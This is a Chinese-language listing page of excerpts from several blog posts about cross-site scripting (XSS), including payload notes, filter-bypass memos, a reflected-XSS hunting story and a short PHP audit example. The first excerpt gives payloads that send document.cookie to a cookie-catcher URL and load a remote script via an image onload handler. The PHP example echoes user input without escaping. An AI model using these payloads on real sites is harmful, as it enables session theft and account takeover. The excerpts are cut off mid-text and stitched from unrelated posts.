xsspayload】的更多相关文章

xsspayload

元素on事件: prompt(document.cookie) document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie console.log(document.cookie) alert(document.cookie) <img src="xxx" onload="$.getScript`https://www.xxx.com/test…

XSS----payload,绕过,xss小游戏记录

一.XSS 1.原理:攻击者把恶意的脚本代码注入到网页中,等待其他用户浏览 这些网页(或触发其他条件),从而执行其中的恶意代码. 1.xss实例代码: test.html <!DOCTYPE html> <head> <title>xss_test</title> </head> <body> <form action="xss.php" method="post"> 请输入你的名字…

php代码审计基础笔记

出处: 九零SEC连接:http://forum.90sec.org/forum.php?mod=viewthread&tid=8059 ---------------------------------------------------------- team:xdsec&90sec author:wilson blog:http://blog.wils0n.cn/ 文章链接:wilson's blog_php代码审计基础笔记[求人气~~] ----------------------…

记一次电信反射xss的挖掘与利用

0X0.前言 早上起床,打开手机习惯性刷刷新闻,却发现网络无法连接,本以为是光猫出现了问题,后来发现是忘记续费,欠费了. 在网上充值完之后,等了有将近十分钟,网依旧没恢复.随打了个电话给客服,客服在后台帮忙刷新了一下数据,一分钟后网络就恢复了. 在我打了个非常满意评价后,客服发了个短信给我,短信内容是这样子的. 点开链接,页面跳转一下,发现是一个客户自检网络,修复网络故障的页面.(上网账号和城市做了修改) 心想这里会不会有点什么呢? 搞事心态一起,那么就研究研究吧. 0x1.反射XSS的挖掘 抽…

Xss Bypass备忘录

Xss Bypass备忘录 技术要发展,免不了风波. 也许这些攻攻防防会更好的促进技术的发展也说不定 就让这一次次的爆破换来将来更精练的技术的无比的宁静吧 我们静观其变吧! 缅怀当初那份最纯真Hacker精神!! 2017.深圳 By:Legend 译文源起 翻译本文最初源自国内在对2014年老道翻译的一个版本,发现此版本有些翻译个人认为不太满意,在加上2017年国庆长假漫漫,无人陪伴(主要还是约妹子没约出来!).所以才对此进行翻译工作,希望对国内各位安全爱好者们有一定帮助吧.请允许译者用自己对…

大众点评selfxss结合两个csrf变废为宝(已修复,故公开,不涉及真实参数)

大众点评selfxss结合两个csrf变废为宝 漏洞不值钱,但还是蛮好玩的 漏洞信息 类型:存储型xss 场景:收藏商户后,去已收藏的商户列表可以给指定商户添加tag(与下文html标签区别) 漏洞限制: 1.selfxss,即需要用户自己登录账号,然后自己输入payload...绕过思路当然是csrf了 2.有waf拦截,绕过思路就是各种换标签换属性换事件尝试咯 3.单个tag字数不能10个字符,多个tag空格隔开,一次最多5个tag 突破selfxss 这里没什么好说的,找到添tag的接口:…

cmd使用notepad++为打开方式打开文件

想放一个txt进入vstart中,但是又不想用系统自带的记事本打开,想在vstart中双击时使用notepad++打开. cmd命令如下: "D:\notepad++\notepad++.exe" xsspayload.txt 将以上命令保存为bat,拖进vstart中,换个图标,就变帅多了. 小细节.…

Web安全之跨站脚本攻击(XSS)

XSS 简介 跨站脚本攻击,英文全称是 Cross Site Script,本来缩写是CSS,但是为了和层叠样式表(Cascading Style Sheet,CSS)有所区别,所以在安全领域叫做"XSS". XSS 攻击,通常指黑客利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,从而通过"HTML注入"篡改了网页,插入了恶意的脚本,然后在用户浏览网页时,控制用户浏览器(盗取用户资料.利用用户身份进行某种动作或者对访问者进行病毒侵害)的一种攻击方式. XS…

WEB安全第六篇--千里之外奇袭客户端:XSS和HTML注入

零.前言 最近做专心web安全有一段时间了,但是目测后面的活会有些复杂,涉及到更多的中间件.底层安全.漏洞研究与安全建设等越来越复杂的东东,所以在这里想写一个系列关于web安全基础以及一些讨巧的payload技巧以便于备忘.不是大神.博客内容非常基础,如果真的有人看而且是大牛们,请不要喷我,欢迎指正我的错误(水平有限). 一.XSS: 1.本质: XSS的本质是HTML代码注入,将用户输入的内容没有经过严格的审查写入了html文件中,用户的的输入内容在富脚本客户端得到执行. 2.分类: //1.…

xss攻击的分类

1.反射型XSS 原理: 通过在页面上植入恶意链接,诱使用户点击,执行js脚本,所谓反射型XSS就是将用户输入的数据(恶意用户输入的js脚本),“反射”到浏览器执行. 实例: php源码: <?php $input = $_GET("param"); echo "<div>".$input."</div>"; ?> 构造xsspayload http://127.0.0.1/test.php?param=<…